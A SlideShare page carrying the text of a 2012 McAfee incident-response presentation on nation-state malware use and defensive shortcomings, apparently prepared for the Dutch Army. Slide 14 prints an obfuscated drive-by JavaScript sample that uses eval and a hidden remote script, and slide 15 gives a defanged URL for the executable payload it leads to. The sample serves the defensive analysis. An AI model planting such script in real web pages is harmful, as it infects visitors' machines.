O slideshow foi denunciado.
Seu SlideShare está sendo baixado. ×

Offensive malware usage and defense

31 de Dez de 2012
4 gostaram 5.078 visualizações
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Próximos SlideShares
"Giving the bad guys no sleep"
"Giving the bad guys no sleep"
Carregando em…3
×

Confira estes a seguir

CSF18 - Guarding Against the Unknown - Rafael Narezzi
NCCOMMS
HITCON 2015 - DGAs, DNS and Threat Intelligence
John Bambenek
Defending Against 1,000,000 Cyber Attacks by Michael Banks
EC-Council
Defcon Crypto Village - OPSEC Concerns in Using Crypto
John Bambenek
Hunting and Legal Hackback using Cyber Deception
Cymmetria
Webinar: Hunting maturity through cyber deception
Cymmetria
e-Extortion Trends and Defense
Erik Iker
Breaking the cyber kill chain!
Nahidul Kibria
1 de 42 Anúncio

Offensive malware usage and defense

31 de Dez de 2012
4 gostaram 5.078 visualizações

Baixar para ler offline

Tecnologia

Presentation for the Dutch Army around cyberwarfare and the usage of malware.

Presentation for the Dutch Army around cyberwarfare and the usage of malware.

Tecnologia
Anúncio

Recomendadas

"Giving the bad guys no sleep"
Christiaan Beek
540 visualizações
32 slides
"There's a pot of Bitcoins behind the ransomware rainbow"
Christiaan Beek
2.1k visualizações
36 slides
The 4horsemen of ics secapocalypse
Christiaan Beek
1.1k visualizações
29 slides
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
PROIDEA
2.4k visualizações
28 slides
MITRE ATTACKCon Power Hour - December
MITRE - ATT&CKcon
1.1k visualizações
120 slides
CSF18 - Incident Response in the Cloud - Yuri Diogenes
NCCOMMS
608 visualizações
34 slides
MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...
MITRE - ATT&CKcon
3.3k visualizações
26 slides
ANALYZE'15 - Bulk Malware Analysis at Scale
John Bambenek
1.3k visualizações
49 slides
Anúncio

Mais Conteúdo rRelacionado

Diapositivos para si (20)

CSF18 - Guarding Against the Unknown - Rafael Narezzi
NCCOMMS
86 visualizações
HITCON 2015 - DGAs, DNS and Threat Intelligence
John Bambenek
1.3k visualizações
Defending Against 1,000,000 Cyber Attacks by Michael Banks
EC-Council
338 visualizações
Defcon Crypto Village - OPSEC Concerns in Using Crypto
John Bambenek
1.5k visualizações
Hunting and Legal Hackback using Cyber Deception
Cymmetria
293 visualizações
Webinar: Hunting maturity through cyber deception
Cymmetria
341 visualizações
e-Extortion Trends and Defense
Erik Iker
919 visualizações
Breaking the cyber kill chain!
Nahidul Kibria
1.3k visualizações
CSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
NCCOMMS
109 visualizações
Corporate Espionage without the Hassle of Committing Felonies
John Bambenek
1.9k visualizações
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE - ATT&CKcon
3k visualizações
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
Chi En (Ashley) Shen
5.8k visualizações
Capture the Flag Exercise Using Active Deception Defense
Fidelis Cybersecurity
747 visualizações
BSides IR in Heterogeneous Environment
Stefano Maccaglia
651 visualizações
Ransomware
Armor
2.7k visualizações
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
EC-Council
558 visualizações
Shamoon
Shakacon
635 visualizações
Helping Small Companies Leverage CTI with an Open Source Threat Mapping
MITRE - ATT&CKcon
636 visualizações
Cymmetria Webinar: Deception & Responder
Cymmetria
448 visualizações
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Lastline, Inc.
648 visualizações
CSF18 - Guarding Against the Unknown - Rafael Narezzi
NCCOMMS
86 visualizações
39 slides
HITCON 2015 - DGAs, DNS and Threat Intelligence
John Bambenek
1.3k visualizações
49 slides
Defending Against 1,000,000 Cyber Attacks by Michael Banks
EC-Council
338 visualizações
38 slides
Defcon Crypto Village - OPSEC Concerns in Using Crypto
John Bambenek
1.5k visualizações
40 slides
Hunting and Legal Hackback using Cyber Deception
Cymmetria
293 visualizações
24 slides
Webinar: Hunting maturity through cyber deception
Cymmetria
341 visualizações
24 slides

Quem viu também gostou (14)

3871778
Christiaan Beek
274 visualizações
Taming worms, rats, dragons & more
Christiaan Beek
1.6k visualizações
[OWASP-TR Mobil Güvenlik Çalıştayı 2015] Yalçın Çakmak - Social Media Apps Fo...
OWASP Turkiye
1.8k visualizações
2011 Social Media Malware Trends
Lumension
676 visualizações
EC-Council Hackway Workshop Presentation- Social Media Forensics
Sina Manavi
3.2k visualizações
Social Media Forensics for Investigators
i-Sight
10.4k visualizações
Lithium Likes to Loves Tour NYC
Lithium
1.1k visualizações
What Makes Great Infographics
SlideShare
1.1M visualizações
Masters of SlideShare
Kapost
979.3k visualizações
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
Empowered Presentations
931.6k visualizações
You Suck At PowerPoint!
Jesse Desjardins - @jessedee
1.4M visualizações
10 Ways to Win at SlideShare SEO & Presentation Optimization
Oneupweb
926.1k visualizações
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
Content Marketing Institute
1.1M visualizações
How to Make Awesome SlideShares: Tips & Tricks
SlideShare
3M visualizações
3871778
Christiaan Beek
274 visualizações
35 slides
Taming worms, rats, dragons & more
Christiaan Beek
1.6k visualizações
79 slides
[OWASP-TR Mobil Güvenlik Çalıştayı 2015] Yalçın Çakmak - Social Media Apps Fo...
OWASP Turkiye
1.8k visualizações
18 slides
2011 Social Media Malware Trends
Lumension
676 visualizações
14 slides
EC-Council Hackway Workshop Presentation- Social Media Forensics
Sina Manavi
3.2k visualizações
25 slides
Social Media Forensics for Investigators
i-Sight
10.4k visualizações
30 slides
Anúncio

Semelhante a Offensive malware usage and defense (20)

Declaration of malWARe
Scott Sutherland
1k visualizações
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
North Texas Chapter of the ISSA
564 visualizações
Defending Enterprise IT - beating assymetricality
Claus Cramon Houmann
927 visualizações
Keynote at the Cyber Security Summit Prague 2015
Claus Cramon Houmann
750 visualizações
How to Detect a Cryptolocker Infection with AlienVault USM
AlienVault
2.3k visualizações
How to Detect System Compromise & Data Exfiltration with AlienVault USM
AlienVault
1.5k visualizações
Presentation infra and_datacentrre_dialogue_v2
Claus Cramon Houmann
437 visualizações
Cyber security-briefing-presentation
sathiyamaha
805 visualizações
Prevent Getting Hacked by Using a Network Vulnerability Scanner
GFI Software
1k visualizações
Ten security product categories you've (probably) never heard of
Adrian Sanabria
1.9k visualizações
DSS ITSEC CONFERENCE - Lumension Security - Intelligent application whiteli...
Andris Soroka
834 visualizações
Operational Security Intelligence
Splunk
1.2k visualizações
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Lastline, Inc.
1.1k visualizações
01_Metasploit - The Elixir of Network Security
Harish Chaudhary
347 visualizações
NetWitness
TechBiz Forense Digital
2.9k visualizações
Wfh security risks - Ed Adams, President, Security Innovation
Priyanka Aash
1.9k visualizações
Stop Watering Holes, Spear-Phishing and Drive-by Downloads
Invincea, Inc.
843 visualizações
[Bucharest] Catching up with today's malicious actors
OWASP EEE
430 visualizações
Cybersecurity Concerns You Should be Thinking About
Advanced Technology Consulting (ATC)
80 visualizações
Mobile Security
Xavier Mertens
6.2k visualizações
Declaration of malWARe
Scott Sutherland
1k visualizações
50 slides
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
North Texas Chapter of the ISSA
564 visualizações
78 slides
Defending Enterprise IT - beating assymetricality
Claus Cramon Houmann
927 visualizações
41 slides
Keynote at the Cyber Security Summit Prague 2015
Claus Cramon Houmann
750 visualizações
40 slides
How to Detect a Cryptolocker Infection with AlienVault USM
AlienVault
2.3k visualizações
18 slides
How to Detect System Compromise & Data Exfiltration with AlienVault USM
AlienVault
1.5k visualizações
16 slides

Mais recentes (20)

How do I print family group records from Family Tree?
kavin smith
0 visualizações
Datasheet-LED-Canopy-Bay-Lights-NOVA-SM-Series.pdf
Guangdong Yibai Optotech Co.,Ltd
0 visualizações
Pumps
PradneshMokal1
0 visualizações
InstrumentTransformer.pdf
Tamil365356
0 visualizações
Salt bath furnace 1000°C
Borel Swiss
0 visualizações
Paris Blockchain Week-Report 2023.pdf
Lou Kerner
0 visualizações
Datasheet-SKYWING-IV-Sport-High-Mast-Light.pdf
Guangdong Yibai Optotech Co.,Ltd
0 visualizações
CRA - overview of vulnerability handling
Olle E Johansson
0 visualizações
Melo-Series-LED-SMART-STREET-LIGHT-Brochure.pdf
Guangdong Yibai Optotech Co.,Ltd
0 visualizações
High-temperature-light-fixture-diamon.pdf
Guangdong Yibai Optotech Co.,Ltd
0 visualizações
Chapter01.ppt
SangeethaVal
0 visualizações
Smart Lighting Control systems Brochure.pdf
Guangdong Yibai Optotech Co.,Ltd
0 visualizações
Datasheet-LED-Area-Light-NOVA-SF-Series.pdf
Guangdong Yibai Optotech Co.,Ltd
0 visualizações
HACKED: A Cyber Security Board Game - Creative Project
Danai Theo
0 visualizações
FEB 20.pptx
ShammerValdez
0 visualizações
Borel Products catalogue 2023
Borel Swiss
0 visualizações
AGILE Model (SDLC).pptx
MahithDias
0 visualizações
Datasheet-Elegant-Series-high-bay-light-Montion-sensor.pdf
Guangdong Yibai Optotech Co.,Ltd
0 visualizações
Datasheet-LED-Wall-Light-NOVA-WM-Series.pdf
Guangdong Yibai Optotech Co.,Ltd
0 visualizações
materi kkpi windows mnj file.pptx
ssuser0d9340
0 visualizações
How do I print family group records from Family Tree?
kavin smith
0 visualizações
2 slides
Datasheet-LED-Canopy-Bay-Lights-NOVA-SM-Series.pdf
Guangdong Yibai Optotech Co.,Ltd
0 visualizações
50 slides
Pumps
PradneshMokal1
0 visualizações
19 slides
InstrumentTransformer.pdf
Tamil365356
0 visualizações
12 slides
Salt bath furnace 1000°C
Borel Swiss
0 visualizações
1 slide
Paris Blockchain Week-Report 2023.pdf
Lou Kerner
0 visualizações
33 slides
Anúncio

Offensive malware usage and defense

  1. Malware Offensive usage and how to defend Christiaan Beek McAfee Professional Services
  2. Agenda • $whoami • Examples • Offensive ways of using malware • What goes wrong • Defense recommendations • Final thoughts
  3. > whoami • Christiaan Beek • Practice lead IR & Forensics EMEA • Developer/Instructor MFIRE • Training CERTS
  4. A Little Background Foundstone Services – McAfee Strategic Security
  5. OFFENSE
  6. Offensive usage of malware ENERGY & INFRA Financial MEDICAL MOBILE Defense
  7. Offensive usage of malware Why malware? • low profile during preparation • many options to spread / infect • many ways to hide • self destruct mechanism • many ways to transfer data to
  8. Offensive usage of malware • More and more discovery of malware frameworks • Multiple modules /components • Written by pro’s – sponsored by nations
  9. Offensive - What’s Different? Development Delivery Detection Command & Control Intent • Nation-States • Zero day • Digitally signed • Central • Surveillance propagation with command • Truly compromised • Disrupt / customized • Multi-vectored: certificates • Modular Destroy payloads Blue tooth, payloads USB, network • Outbound ex- filtration masking
  10. Stages of an attack:
  11. Stages of an attack:
  12. Stages of an attack:
  13. Stages of an attack:
  14. Stages of an attack – first script script type="text/javascript" src="swfobject.js"></script> <script src=jpg.js></script> <script type="text/javascript"> if(document.cookie.indexOf("DCHJEik8=")==-1 && hiOC2.indexOf("linux")<=-1 && hiOC2.indexOf("bot")==-1 && hiOC2.indexOf("spider")==-1) var jMJFRp3=deconcept.SWFObjectUtil.getPlayerVersion(); var expires=new Date(); expires.setTime(expires.getTime()+1*60*60*1000); document.cookie="DCHJEik8=Yes;path=/;expires="+expires.toGMTString(); for(WdkimKX2=0,gNRb4=true,sAgnGw8=["msie","firefox","opera"];gNRb4;WdkimKX2++){gNRb4=gNRb4 && (navigator.userAgent.toLowerCase().indexOf(sAgnGw8[WdkimKX2])>-1);if(WdkimKX2==sAgnGw8.length- 1)WdkimKX2=-1;}Hwqq6="0";delete Hwqq6;try{Hwqq6+="0"+"0";}catch(e){yltBe1=unescape;mYSdOxl6 = eval;}CwefLf0=“S1+ADphS1(hmacmx8)))^MqiovxR7);}try{new function(){EmIcO0(EJiD6);}}catch(e){try{new function(){Qkrnq6=parseInt;vKFaTPR4(EJiD6);}}catch(e) } </script> <DIV style="VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px"><script language="javascript" src="hxxp://count2.51yes……….. 31931&logo=12" charset="gb2312"></script></DIV>
  15. Final destination?: hxxp://222.7x.xx.xx.xx/x.exe
  16. Inner working?
  17. IIS logs on hacked ‘landing’ server: 9/23/2012 4:06:16 70.49.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:07:46 99.23.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:08:25 93.80.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:14:48 208.91.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:36:05 95.27.x.x W3SVC1 80 GET /pay/x.exe 9/23/2012 5:15:23 208.91.x.x W3SVC1 80 GET /x.exe 9/23/2012 5:29:27 74.125.x.x W3SVC1 80 GET /x.exe Dial 80 Or 443
  18. War story
  19. Future usage of malware
  20. Future scenario’s
  21. Future scenario’s or real...?
  22. Future scenario’s
  23. Future scenario’s
  24. Future scenario’s
  25. Future scenario’s
  26. Future scenario’s
  27. Future scenario’s
  28. What goes wrong regarding Defense? An Intel company
  29. Problem #1 An Intel company Many solutions but how to use them? Forensic Readiness?
  30. Problem #2 An Intel company No visibility on the network No correlation of events
  31. Problem #3 An Intel company Lack of skilled, experienced and dedicated people
  32. Problem #4 An Intel company No Incident Response procedures No Dry-run exercise
  33. Problem #5 An Intel company The attack came from…..
  34. Problem #6 An Intel company Destroying evidence
  35. Problem #7 An Intel company who is the system owner? who will take action? who is allowed to take decisions?
  36. An Intel company Defense Strategies
  37. The Big “Threat” Picture Threats Threats All Threats All Known Core AntiVirus AntiVirus Threats Sees Protects
  38. The “Core” Security Problem • “Unauthorized” Execution End Users = Data – Payload/attachment/link – Network Identity Thieves Spammers – Privilege Bot Herder • “Authorized” Execution – Insiders misuse of privilege Vulnerability Tool Discoverers Developers 100101010010110 Malware Developers
  39. Defense-in-depth
  40. Worthless without:
  41. Final thoughts...... An Intel company - Incidents happen - Is forensic & malware readiness on your agenda? - What needs to be changed in your process? - Is your {army-unit/company/agency/etc} prepared? - Did you separate critical infrastructures? - Can we help you?
  42. Thank you! An Intel company Keep in touch: Email: Christiaan_Beek@McAfee dot com Twitter: @FSEMEA @Foundstone @ChristaanBeek

×